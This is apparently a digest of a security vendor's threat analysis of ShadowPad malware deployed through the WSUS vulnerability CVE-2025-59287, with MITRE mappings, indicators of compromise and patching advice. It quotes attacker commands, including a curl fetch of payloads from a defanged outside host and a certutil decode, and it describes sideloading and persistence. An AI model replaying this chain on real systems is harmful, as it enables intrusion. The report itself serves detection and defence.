Threat Research

Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287)

Ahnlab
Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287)

AhnLab ASC and SentinelOne reporting show CVE-2025-59287 in WSUS was exploited to deliver ShadowPad by chaining PowerCat for shell access and using certutil/curl to fetch and decode payloads. Observed artifacts include ETDApix.dll sideloading with ETDCtrlHelper.exe, tmp file configs for persistence, and C2 at 163.61.102[.]245; remediation: apply Microsoft update and restrict WSUS access. #CVE-2025-59287 #ShadowPad

Keypoints

  • Attackers exploited a remote code execution vulnerability in Windows Server Update Services (CVE-2025-59287) to gain system-level access on WSUS-enabled servers.
  • Initial access included executing PowerCat (PowerShell Netcat) to obtain a CMD shell after PoC code disclosure.
  • Operators used built-in Windows utilities (curl.exe and certutil.exe) to download and decode ShadowPad components (tmp, dll, exe files).
  • ShadowPad was deployed via DLL sideloading: ETDApix.dll loaded by ETDCtrlHelper.exe with the core functionality in a .tmp file (0C137A80.tmp).
  • Configuration shows persistence via Run key and scheduled task entries using names like Q-X64 and Microsoft Corporation, with multiple startup paths.
  • Observed C2 infrastructure includes 163.61.102[.]245 over HTTP/HTTPS with specific HTTP headers and POST usage.
  • Recommended mitigations: apply Microsoft patch for CVE-2025-59287, restrict WSUS access (block non-Microsoft inbound on TCP 8530/8531), and audit PowerShell, certutil, curl usage and network logs.

MITRE Techniques

  • [T1218 ] Signed Binary Proxy Execution – Legitimate Windows utilities certutil.exe and curl.exe were used to download and decode ShadowPad components (“certutil -decode C:users%ASD%tmp.txt C:programdataC137A80.tmp” and curl downloads).
  • [T1059.001 ] PowerShell – PowerCat (PowerShell-based Netcat) was executed to obtain a system shell (“PowerCat being executed against a Windows Server system…gained access to the CMD shell”).
  • [T1574.001 ] DLL Search Order Hijacking or T1546.008? (DLL Sideloading) – ShadowPad relied on DLL sideloading where ETDApix.dll was loaded by ETDCtrlHelper.exe to run the loader in memory (“When the legitimate executable (ETDCtrlHelper.exe) runs, the malicious DLL (ETDApix.dll) acts as the ShadowPad loader, operating entirely in memory.”).
  • [T1105 ] Ingress Tool Transfer – Attackers downloaded payload files (tmp.txt, dll.txt, exe.txt) from hxxp://149.28.78[.]189:42306 to the victim using curl and saved them to disk (“curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:users%ASD%tmp.txt …”).
  • [T1547.001 ] Registry Run Keys / Startup Folder – Persistence created via Run key entries under SOFTWAREMicrosoftWindowsCurrentVersionRun with value Q-X64 (“Persistence Registry Key … Persistence Registry Value Q-X64”).
  • [T1053.005 ] Scheduled Task – Persistence via Task Scheduler entries under MicrosoftWindowsUPnP with names/descriptions matching Q-X64 (“Task Scheduler Path MicrosoftWindowsUPnP … Task Scheduler Name Microsoft Corporation”).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – C2 communication over HTTP/HTTPS to 163.61.102[.]245:443 using POST and specific headers (“C&C #1 HTTP://163.61.102[.]245:443 … C&C Header #1 POST … User-Agent: Mozilla/5.0 …”).
  • [T1055 ] Process Injection – ShadowPad injects into legitimate processes listed in config (WinMail.exe, wmpnetwk.exe, wmplayer.exe, svchost.exe) (“Injection Target Process Path … ‘svchost.exe’ Q-X64”).

Indicators of Compromise

  • [IP Address ] C2 and download host – 163.61.102[.]245 (C2 over HTTP/HTTPS), 149.28.78[.]189:42306 (payload host).
  • [File Name ] Downloaded and temporary files used in deployment – tmp.txt, dll.txt, exe.txt and 0C137A80.tmp (core ShadowPad tmp file).
  • [File Hash ] Malicious DLL and EXE hashes – ETDApix.dll MD5 27e00b5594530e8c5e004098eef2ec50, ETDCtrlHelper.exe MD5 564e7d39a9b6da3cf0da3373351ac717.
  • [Mutex / Service ] Persistence identifiers – Mutex/Service name Q-X64 and service display/description strings (Q-X64 Service / Q-X64 Service for windows).
  • [Registry Key ] Persistence location – SOFTWAREMicrosoftWindowsCurrentVersionRun value Q-X64 (persistence registry entry).

Read more: https://asec.ahnlab.com/en/91166/